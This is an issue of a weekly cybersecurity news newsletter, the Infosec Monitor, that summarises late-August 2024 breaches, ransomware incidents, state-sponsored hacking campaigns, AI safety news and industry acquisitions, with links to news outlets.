No. 41, August 30, 2024

Welcome back to another edition of the Infosec Monitor. A weekly newsletter covering what's happened, what's happening, and what's coming in cybersecurity.

In this week's edition of the Infosec Monitor — Iranian hackers are teaming up with ransomware gangs, was the US Marshall Service breached, and the Telegram CEO arrest sparked DDoS attacks.

Highlight of the Week

Iranian hacking groups target US, UAE sectors, partner with ransomware gangs

Iranian hacking groups Pioneer Kitten and Peach Sandstorm are targeting critical sectors in the U.S. and UAE, collaborating with ransomware gangs, and deploying custom malware. Their activities, linked to the IRGC, focus on exploiting vulnerabilities in major tech infrastructures. Bleeping Computer Cyberscoop

Get The Infosec Monitor every Friday in your inbox

Subscribe 👉 https://infosecmonitor.beehiiv.com

News

Arrest of Telegram CEO sparks hacktivist cyberattacks on French websites

Telegram CEO Pavel Durov's arrest in France led hacktivists to launch DDoS attacks against key French websites. Authorities cite Telegram's lack of crime moderation. Major hackers like the Russian Cyber Army Team, UserSec, and RipperSec participated. Impacted sites include government, media, health, agriculture, energy, and financial sectors. SC Magazine

US Marshals Service disputes breach claims by hunters international ransomware gang

US Marshals Service denies Hunters International's breach claims after being listed on their leak site. The posted data matches files sold in March 2023. Hunters International, potentially a rebranded Hive, has targeted several high-profile organizations, making 157 attacks in 2023. Bleeping Computer

CrowdStrike has estimated its July incident has cost them $60M. SecurityWeek

American Radio Relay League paid $1 million ransom after ransomware attack

The ransom was mainly covered by insurance. Bleeping Computer

AI & Security

OpenAI and Anthropics partner with US AI safety institute for responsible AI development

OpenAI and Anthropic will share their AI models with the U.S. AI Safety Institute to ensure safety and innovation. The institute, part of NIST, will have early and ongoing access to these models, promoting responsible AI development and transparency. siliconANGLE

AI safety becomes a divisive issue as industry debates guardrails, public use. Axios

Cybersecurity Incidents

Cyberattack disrupts Seattle airport

A cyberattack disrupted Seattle-Tacoma International Airport during a peak travel period, causing significant delays and limited operations. Alaska Airlines advised avoiding checked bags, and airport websites remain down. This attack follows recent disruptions to U.S. critical infrastructure. The incident is under investigation, with recovery time unclear. Axios

Park’n Fly data breach exposes 1 million customers’ information

Park'N Fly's data breach exposed personal information of 1 million Canadian customers via stolen VPN credentials between July 11-13, 2024. No financial data was compromised. The company fully restored systems within five days and advised customers to reset Aeroplan passwords and stay vigilant for phishing. BleepingComputer

APT32's multi-year cyberattack targets Vietnamese human rights group

A Vietnamese human rights non-profit faced a multi-year cyberattack by APT32 (aka OceanLotus), deploying various malware through methods like spear-phishing. The campaign, ongoing for at least four years, aimed to steal sensitive information and intellectual property. The Hacker News

Texas Dow Employees Credit Union data breach impacts 500,000

The Texas Dow Employees Credit Union notified 500,000 individuals of a data breach linked to the 2023 MOVEit attacks by the Clop ransomware gang. Discovered on July 30, the breach affected personal data including Social Security numbers and financial details. Experts stress improved cybersecurity practices and vigilance against ongoing threats. SC Magazine

Almost a million affected by Young Consulting data breach, BlackSuit claims responsibility

Young Consulting (Connexure) notified 954,177 individuals of an April 10, 2024, data breach claimed by BlackSuit ransomware. Compromised data includes personal and insurance information. Management refused to negotiate, leading to public release of the data. Affected individuals get free credit monitoring. FBI links BlackSuit to Royal ransomware, targeting various sectors. Cybernews

Durex India exposed customer data due to site vulnerability

Durex India exposed customers' personal data due to improper authentication on its order confirmation page. Hundreds likely affected. The data include names, phone numbers, and product details. TechCrunch verified the issue, and Durex's parent company, Reckitt, declined to comment. TechCrunch

Dick’s Sporting Goods reports cyberattack exposing confidential data

Dick’s Sporting Goods disclosed a cyberattack on August 21, 2024, potentially exposing confidential information. They shut down email and locked employee accounts, manually verifying identities. Despite the breach, business operations remain unaffected. Investigation continues, with federal law enforcement notified. Bleeping Computer

Ireland’s Fota Wildlife Park hit by cyberattack

Fota Wildlife Park in Cork, Ireland, faced a cyberattack affecting ticket buyers from May to August. Customers are urged to cancel their bank cards due to potential financial data breaches. The park is investigating with cybersecurity experts and has secured its website, though the facility remains open. The Record

ServiceBridge data breach exposes 31.5 million sensitive documents since 2012

A security researcher found 31.5 million sensitive documents exposed from ServiceBridge, affecting multiple industries since 2012. Data included contracts, invoices, personal info, and HIPAA forms, raising significant privacy and security concerns. The database was removed after disclosure, but the exposure duration and access by unauthorized parties remain unclear. Cybernews

Illinois county leaked voter data for months

St. Clair County, Illinois leaked nearly 470,000 sensitive voter documents via a misconfigured Amazon S3 bucket. The data, accessible for months, includes names, addresses, Social Security numbers, and more, posing risks like identity theft and voter fraud. The leak was secured post-discovery in March 2024. Cybernews

Patelco Credit Union ransomware attack exposes 726,000 customers’ data

Patelco Credit Union disclosed that a RansomHub ransomware attack led to a data breach impacting 726,000 customers. Exposed data includes SSNs and driver’s license numbers. On August 15, 2024, attackers published the data. Patelco provides affected users with two-year identity protection. Increased phishing risks are noted. Bleeping Computer

Threat Intel

Cryptojacking attacks continue exploiting critical Atlassian Confluence vulnerability

Trend Micro reports ongoing cryptojacking attacks exploiting CVE-2023-22527, a critical flaw in Atlassian Confluence first discovered in January. Threat actors use shell scripts, XMRig miners, and target SSH endpoints, maintaining persistence via cron jobs. Administrators are urged to patch systems, segment networks, and conduct regular security audits. Dark Reading

Spear-phishers target manufacturing sector for Microsoft credentials

Spear-phishers in the US and Canada are targeting the manufacturing sector by impersonating known companies to steal Microsoft credentials. Emails lure victims to a fake Microsoft login, harvesting their passwords. Experts advise monitoring spoofed domains and educating employees to counter the threat. Dark Reading

Chinese hackers exploit critical software flaw targeting ISPs

Chinese state-sponsored hackers, Volt Typhoon, exploit a zero-day flaw in Versa Director software used by ISPs. They leverage elevated admin privileges to upload malicious files and evade detection. At least five companies, including four in the US, are compromised. CISA advises urgent patching by September 13. Cybernews

Russian group APT29 targets Mongolian government websites with NSO group exploits

Google linked a cyber-espionage campaign against Mongolian government sites to Russia's APT29, using exploits previously deployed by Intellexa and NSO Group. The operation aimed to steal cookies and credentials from iPhone, Android, and Chrome users. The Record

BlackByte ransomware gang only posting 20% to 30% of successful attacks. The Record

One million WordPress sites have flaw that enables remote code execution. The Hacker News

Interesting Reads

OWASP: A crucial resource for web application security and AI standards

OWASP is a nonprofit offering resources to enhance web app security. Amid increasing data breaches, OWASP provides impartial guidance to address vulnerabilities. The OWASP Top 10 lists critical risks, aiding developers and security experts. OWASP also advances AI security through the OWASP AI Exchange. CSO Online

Data & Research

Vulnerabilities

• 17,518 new vulnerabilities discovered in the first half of 2024, up 11% from 2023. 45% of these are rated high to critical.

• Over 45% of vulnerabilities disclosed in the first half of 2024 were rated high to critical.

siliconANGLE

Cybersecurity Mergers, Acquisitions, and Funding

Mergers & Acquisitions

Robust Intelligence, AI security, acquired by Cisco for an undisclosed sum. siliconANGLE

Cyberint, cyber risk management, to be acquired by Check Point for undisclosed sum. SecurityWeek

Bird Eat Bugs, bug reporting, acquired by BrowserStack for an undisclosed sum. siliconANGLE

VC Funding

Cribl, IT and data security, raises $319M in Series E funding. SecurityWeek

Uniquekey, business password management, raises $5.9M in venture funding (series unknown). SecurityWeek

Get The Infosec Monitor every Friday in your inbox

Subscribe 👉 https://infosecmonitor.beehiiv.com